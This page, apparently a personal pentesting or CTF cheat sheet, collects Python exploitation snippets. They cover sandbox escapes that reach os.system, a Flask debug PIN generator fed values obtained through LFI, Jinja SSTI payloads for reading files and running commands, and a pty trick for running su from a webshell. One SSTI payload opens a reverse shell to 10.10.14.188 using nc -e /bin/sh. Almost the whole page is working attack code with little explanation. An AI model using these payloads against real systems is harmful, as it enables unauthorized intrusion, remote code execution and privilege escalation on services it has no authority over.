xct's notes
Search…
Python

Bypass python builtins none

Python2

1
().__class__.__base__.__subclasses__()[59]()._module.__builtins__['__import__']('os').system('whoami')
Copied!

Python3

1
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('whoami')
Copied!

QRCode from Terminal Output

1
#!/usr/bin/env python2
2
from pwn import *
3
from subprocess import check_output
4
import subprocess
5
6
p = remote('host',1234)
7
img = p.recvuntil("[+]")
8
print(img)
9
subprocess.call("gnome-screenshot -f x.png", shell=True)
10
output = subprocess.check_output("zbarimg x.png ", shell=True)
11
print(output)
12
p.interactive()
Copied!

Flask Debug Pin from LFI

Get the values for "probably_public_bits" from a Stacktrace, then run the script to get the PIN.
1
import hashlib
2
from itertools import chain
3
probably_public_bits = [
4
'',# username
5
'flask.app',# modname
6
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
7
'/usr/local/lib/python2.7/dist-packages/flask/app.pyc' # getattr(mod, '__file__', None),
8
]
9
10
private_bits = [
11
'345052358410',# str(uuid.getnode()), /sys/class/net/ens33/address
12
'258f132cd7e647caaf5510e3aca997c1'# get_machine_id(), /etc/machine-id
13
]
14
15
h = hashlib.md5()
16
for bit in chain(probably_public_bits, private_bits):
17
if not bit:
18
continue
19
if isinstance(bit, str):
20
bit = bit.encode('utf-8')
21
h.update(bit)
22
h.update(b'cookiesalt')
23
24
cookie_name = '__wzd' + h.hexdigest()[:20]
25
26
num = None
27
if num is None:
28
h.update(b'pinsalt')
29
num = ('%09d' % int(h.hexdigest(), 16))[:9]
30
31
rv =None
32
if rv is None:
33
for group_size in 5, 4, 3:
34
if len(num) % group_size == 0:
35
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
36
for x in range(0, len(num), group_size))
37
break
38
else:
39
rv = num
40
41
print(rv)
Copied!

SSTI Jinja

Read File

1
{{ ''.__class__.__mro__[2].__subclasses__()[40]()(<file>).read()}}
2
{%include+request.application.__globals__.__builtins__[request.args.import](request.args.os).popen(request.args.cmd).read().__str__()%}&import=__import__&os=os&cmd=ls
Copied!
1
?a=somevalue&name={%%20if%20session.update({request.args.a:%20True})%20%}{%endif%}
2
?a=os&b=ls&name={% if session.update({request.application.__globals__.__builtins__.__import__(request.args.a).popen(request.args.b).read(): True}) %}{%endif%}
Copied!

RCE

1
{config.__class__.__init__.__globals__['os'].popen(<command>).read()}}
Copied!
Alternative:
1
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("nc.traditional 10.10.14.188 2000 -e /bin/sh").read()}}{%endif%}{% endfor %}
Copied!

Sneaky SU from Webshell

1
cmd=(sleep 1; echo password) | python3 -c "import pty; pty.spawn(['/bin/su','-c','whoami']);"
Copied!

Resources

Last modified 1yr ago